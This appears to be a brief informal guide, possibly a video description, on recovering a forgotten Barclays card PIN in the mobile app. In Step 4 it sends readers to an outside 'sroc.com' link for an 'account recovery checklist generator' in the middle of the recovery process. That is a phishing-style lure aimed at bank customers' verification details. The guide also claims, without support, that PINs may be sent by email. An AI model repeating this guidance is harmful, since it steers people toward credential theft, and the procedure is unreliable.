friend asked me about this, so I tested it and here's what worked. If you've forgotten your Barclays card PIN, don't worry, recovery it is straightforward. Just follow these steps. Step 1. Access the Barclays app. Open the Barclays mobile app on your smartphone. If you haven't installed it yet, download it from your app store. Step 2. Log into your account. Enter your login details to access your account. If you've forgotten your online banking password, you can reset it through the app. Step 3. Navigate to card management. Once logged in, find the card management section in the app. This is where you can manage your card settings, including PIN recovery. Step 4. Select PIN recovery. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Receive your PIN. After verification, your PIN will be displayed on the screen or sent to your registered email or phone number. Make sure to store it securely. Remember, if you encounter any issues, you can always call Barclays customer service for assistance. Good luck, and I hope you find your PIN quickly.